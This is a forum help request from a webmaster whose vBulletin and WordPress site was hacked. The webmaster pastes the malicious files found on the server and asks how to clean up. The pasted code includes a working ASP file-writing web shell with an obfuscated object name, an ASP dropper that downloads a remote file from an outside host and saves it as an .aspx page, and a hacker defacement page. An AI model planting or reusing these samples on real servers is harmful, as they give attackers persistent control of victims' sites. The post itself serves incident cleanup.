My Wordpress / vBulletin 4 forum has been hacked. I found a lot of issues on the WP side of things, and I started combing through the files on vBulletin. I found xss.asp; which is a text document with the following code in it.
I also found a file named zart.asp; which is a jpg file, but I can't open it in Dreamweaver, or Fireworks, but was able to open it with Notepad++.
I'll follow this with the following files I found in the root of vB4:
BBHH.html (I know is a hack file)
site.php;.jpg
zart.php;.jpg
xss.asp;.txt
teste.txt (code below)
Okay, there may be more but I need to know if I can just delete the files, and if all of these files are hacked files. I see no mention of who the coder is on most of the files. What steps do I follow to clean my board? Many thanks for your assistance.
BTW- admincp and modcp are not the names I used this thread for security: Secure your vB forum
Code:
<% set fso = Server.CreateObject("Scripting.FileSystemObject") mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME")) if session(myScriptName) = "" then for x = len(mapPath) to 0 step -1 myScriptName = mid(mapPath,x) if instr(1,myScriptName,"\")>0 then myScriptName = mid(mapPath,x+1) x=0 session(myScriptName) = myScriptName end if next Else myScriptName = session(myScriptName) end if %><%dim objfso%><%dim fdata%><%dim objcountfile%><%on error resume next%><%set objfso = server.createobject("S"+"cr"+"ipt"+"ing"+".f"+"il"+"es"+"ys"+"tem"+"ob"+"jec"+"t")%><%if trim(request("syfdpath"))<>"" then%><%fdata = request("cyfddata")%><%set objcountfile=objfso.createtextfile(request("syfdpath"),true)%><%objcountfile.write fdata%><%if err =0 then%><%response.write "<font color=red>save success!</font>"%><%else%><%response.write "<font color=red>save unsuccess!</font>"%><%end if%><%err.clear%><%end if%><%objcountfile.close%><%set objcountfile=nothing%><%set objfso = nothing%><%response.write "<center><form action="" method=post>"%><%=server.mappath(request.servervariables("script_name"))%><%response.write "<br>"%><%response.write "<input type=text name=syfdpath width=32 size=50>"%><%response.write "<br>"%><%response.write "<textarea name=cyfddata cols=100 rows=10 width=32></textarea>"%><%response.write "<br>"%><%response.write "<input type=submit value=SAVE>"%><%response.write "</form></center>"%>
Code:
<% Option Explicit Dim cOUT,scc,cURL,objXML,binXML,objADO scc = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) cOUT = Left(scc,Len(scc) - 13) cURL = "http://hamyaran.sharif.edu/gallery/images/1.txt" Const cform = "Default.cs.aspx" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", cURL , False objXML.Send binXML = objXML.ResponseBody Set objXML = Nothing Set objADO = server.CreateObject("ADODB.Stream") objADO.Type = 1 objADO.Open objADO.Write binXML objADO.SaveToFile cOUT & cform,2 Set objADO = Nothing Response.Write "downloaded." %>
BBHH.html (I know is a hack file)
site.php;.jpg
zart.php;.jpg
xss.asp;.txt
teste.txt (code below)
Code:
<title>HackeD bY BLACK BURN (BBHH)</title> <body bgcolor = Black> <center><h1> <font color= red>HackeD bY BLACK BURN (BBHH)</font> </h1> </center> <hr > <br> <br> <center> <h3><font color= blue>We Show No Mercy,Take No Mercy:We Are Legends,We Are Sniper's,Be Ware - We Are Here - We Are Everywhere,Respect Us</font> </h3></center> <br> <center><img src = "http://i39.tinypic.com/24dlshg.jpg"></center> <br> <center><font color = red>GREETZ :- Xtor,Back Bone,Orion Hunter,cyb3r_gangst3r, K_5h3ll,N3opHyT3H4ck3r,RKHM00N,Gh0st KilL3r,Death WisheR,Z3RO,Whishper Death,cMshAcK,v0174g3,Sakib Sami And All Bangladesh Black Hat Hackers </font></center> <embed src="http://www.youtube.com/v/XYKUeZQbMF0&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed> </body> </html>
BTW- admincp and modcp are not the names I used this thread for security: Secure your vB forum
Comment